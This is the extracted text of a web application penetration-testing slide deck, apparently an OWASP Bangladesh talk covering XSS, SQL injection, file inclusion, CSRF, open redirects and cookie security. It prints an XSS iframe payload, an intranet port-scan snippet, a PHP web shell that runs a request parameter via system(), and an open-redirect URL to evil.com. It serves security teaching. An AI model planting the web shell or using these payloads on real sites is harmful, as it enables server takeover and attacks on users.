The document discusses web application security, emphasizing the importance of penetration testing to identify vulnerabilities such as XSS, SQL injection, and CSRF. It outlines various techniques and tools used for testing and securing web applications, alongside references to the OWASP Top 10 security risks. Additionally, it highlights key concepts like the same origin policy and cookie security measures to enhance web application defenses.

2. PENETRATION TESTING
WEB APPLICATION/WEB
APPLICATION (IN)
SECURITY@nahidupa

3. WEB APPLICATION (IN)SECURITY
Whyshouldwecareasasoftwarecompany?

4. DISCLAIMER
Do notuse anythingyou learn here withoutlegalauthorization
“with greatpower comes greatresponsibility” –also with great
Knowledge comes great
I'm copied text/images from internethere and there... it's not
posssible to mention allsource thanks all.

5. WHAT IS NOT WEB APPLICATION SECURITY?
NotNetwork Security
Network SecurityMostlyIgnores the Contents of HTTP
Traffic.
Firewalls, Intrusion Detection Systems.

6. TODAYS SCOPE
We willlearn basis
Notgoingtoo much details on developing/defense
Tryto show some automation

7. STANDARD WEB MODEL

8. WEB APPLICATION THREAT SURFACE
XSS
CSRF
Parameter
tempering
/sniffing
DirectoryTraversal
FORGED
TOKEN
DIRECTOBJECT
REFERENCE
Click jacking
XML
Injection
SQLInjection

9. THERE ARE MANY WEB APPLICATION
SECURITY RISKS

10. OWASP TOP 10 WEB APPLICATION SECURITY
RISKS

11. OWASP RISK RATING METHODOLOGY

12. OWASP RISK RATING METHODOLOGY

13. OWASP RISK RATING METHODOLOGY

14. OWASP RISK RATING METHODOLOGY

15. OWASP RISK RATING METHODOLOGY

16. OWASP RISK RATING METHODOLOGY

17. OWASP RISK RATING METHODOLOGY

18. OWASP RISK RATING METHODOLOGY

19. OWASP RISK RATING METHODOLOGY

20. OWASP RISK RATING METHODOLOGY

21. TOP 10 2013-RISK

22. BASIC HTTP AND HTTPS PROTOCOLS
HTTP is connection less
HTTP is mediaindependent
HTTP is stateless
more

23. MYTH OF WEB APPLICATION SECURITY AND
REALITY
more

24. PENETRATION TESTING
We can tryin offensive way

25. PENETRATION TESTING
Attemptto compromise securitybyusingthe same techniques
of the attacker
If I was an attacker, how far would I be able to go?
How easyis itto compromise this computer |network |
application | system?

26. WHY PENETRATION TESTING?
Hack yourself before someone else do.
Save Money!=== Save reputation!

27. INFORMATION GATHER ON TARGET
The Dark Arts of Open-source intelligence (OSINT)

28. NMAP
More on ppt

29. WHAT WEB
CMS Identification
WP Scan
Plecost
BlindElephant.pyhttp://127.0.0.1 guess

31. WEB BROWSER SECURITY MODELS
The same origin policy
The cookies securitymode
The Flash securitymodel/SandBox (Class 5 RIA)

32. SAME ORIGIN POLICY
The same origin policyprevents documentor scriptloaded from
one origin, from gettingor settingproperties from aof a
documentfrom adifferentorigin.
An origin is defined as the combination of
hostname, protocol, and portnumber;

33. URL ANATOMY
Globalidentifiers of network-retrievable documents
Specialcharacters are encoded as hex:
%0A= newline
%20 = space, %2Bmean +

38. EXCEPTIONS TO THE SAME ORIGIN POLICY
Browsers can be instructed to allow limited exceptions to the same origin policy
by setting JavaScript’s document. Domain variable on the requested page.
Ifhttp://www.foo.com/bar/baz.htmlhadthefollowinginitspage,
<script>
document.domain="foo.com";
</script>
thenhttp://xyz.foo.com/anywhere.htmlcansendanHTTPrequestto
http://www.foo.com/bar/baz.htmlandreaditscontents.

39. BUT BUT BUT ….
You cannot put any domain in document.domain.
The document.domainmust be the superdomain of the domain
from which the page originated, such as foo.com from
.
<iframesrc="http://www.foo.com/bar/baz.html"
onload="frames[0].document.body.innerHTML+=’<
imgsrc=xonerror=alert(1)’“></iframe>
www.foo.com

40. WHAT HAPPENS IF THE SAME ORIGIN POLICY
IS BROKEN?

41. CROSS-SITE SCRIPTING (XSS)
XSS is an attack technique thatforces aWeb site to display
malicious code, which then executes in auser’s Web browser.

42. HOW ??
While browser parse htmlif found scripttagitload as
script/JavaScript

43. XSS TYPE
Non-persistent
DOM-based
Persistent

44. WHAT MAKES XSS SO SCARY?

45. WHAT CAN AN ATTACKER DO WITH XSS
HistoryStealing
IntranetHacking
XSS Defacements
DNS pinning
HackingJSON
Cookie stealing
Clipboard stealing
Even more?Whatelse you need?

46. HISTORY STEALING
Anyidea?

47. Browser make previouslyvisited link in differentcolor
HISTORY STEALING

49. RESULT

50. REAL LIFE EXAMPLE(EXPOSED)
Who Stealingyou history

51. INTRANET HACKING

52. OBTAINING NAT’ED IP ADDRESSES

53. PORT SCANNING

54. CODE
window.onerror=err;
if(!msg.match(/Errorloadingscript/))
//ipdoesnotexit’s
Else
Findinternalip

55. BLIND WEB SERVER FINGERPRINTING
ApacheWebServer
/icons/apache_pb.gif
HPPrinter
/hp/device/hp_invent_logo.gif
<'imgsrc="http://intranet_ip/unique_image_url">

56. XSS DEFACEMENTS

57. COOKIE STEALING

58. HOW TO FIND THIS TYPE OF BUG ?
demo ...lab

59. PR3VENTING

60. SQL INJECTION

61. TOOLS
Tamper Data

62. HANDS ON

65. CSRF(CROSS-SITE REQUEST FORGERY)
more
The SleepingGiant

66. LFI(LOCAL FILE INCLUSION)

67. DEMO

68. TOOLS
./fimap.py-u http://127.0.0.1/mutillidae/?page=

69. RFI(REMOTE FILE INCLUSION)
Remote File Inclusion (RFI) is atype of vulnerabilitymostoften
found on websites, itallows an attacker to include aremote file
usuallythrough ascripton the web server

70. if (!empty($_GET['cmd '])){
echo("<pre>");
$ff=$_GET['cmd '];
system($ff);
echo("</pre>");
}?>
WEB SHELL
<?php

71. DEMO

72. REVIEW WHAT WE DONE SO FAR

73. BROKEN AUTHENTICATION AND SESSION
MANAGEMENT
more in ppt

74. EDIT COOKIE

75. GO PPT

76. INSECURE DIRECT OBJECT REFERENCES
http://example.com/app/accountInfo?acct=345345345
http://example.com/app/accountInfo?acct=643343341
http://example.com/app/accountInfo?acct=84334d340

77. USING COMPONENTS WITH KNOWN
VULNERABILITIES

78. UNVALIDATED REDIRECTS AND FORWARDS

79. SCENARIO #1:
The application has apage called “redirect.jsp” which takes a
single parameter named “url”. The attacker crafts amalicious
URL thatredirects users to amalicious site thatperforms
phishingand installs malware.
http://www.example.com/redirect.jsp?url=evil.com

80. SCENARIO #2:
The application uses forward to route requests between
differentparts of the site. To facilitate this, some pages use a
parameter to indicate where the user should be sentif a
transaction is successful. In this case, the attacker crafts aURL
thatwillpass the application’s access controlcheck and then
forward the attacker to an administrative function thatshe
would notnormallybe able to access.
http://www.example.com/boring.jsp?fwd=admin.jsp

81. Watcher-fidler addon-https://websecuritytool.codeplex.com/
http-open-redirectNSE Script

82. SECURITY MISCONFIGURATION
Customise your error messages
http://www.troyhunt.com/2010/12/owasp-top-10-for-net-
developers-part-6.html

83. HOW MANY TIME YOU SAW THIS IN LIVE
SERVER?

84. WATOBO

85. MIXED CONTENT: HTTP AND HTTPS

86. MITIGATION
HTTP StrictTransportSecurity(HSTS)
ContentSecurityPolicy(CSP)

87. CALOMEL

88. COOKIE SECURITY POLICY
Path attribute:domain securitymodel
http://x.y.z.com/a/WebApp setacookie with path /a;
then the cookie would be sentto allrequests to
http://x.y.z.com/a/*only.
The cookie would notbe sentto http://x.y.z.com/index.htmlor
http://x.y.z.com/a/b/index.html.

89. COOKIE SECURITY POLICY
Secure attribute:Ifacookie hasthisattribute set,the cookie issent onlyonHTTPS requests.

90. HTTPONLY COOKIES
HttpOnlyattribute

91. DEMO

93. OWASP TESTING FRAMEWORK
OWASP TestingGuide
More in PPT

94. AUTOMATION AND MOBILE

95. THE END
@nahidupa
AbitaboutOWASP Bangladesh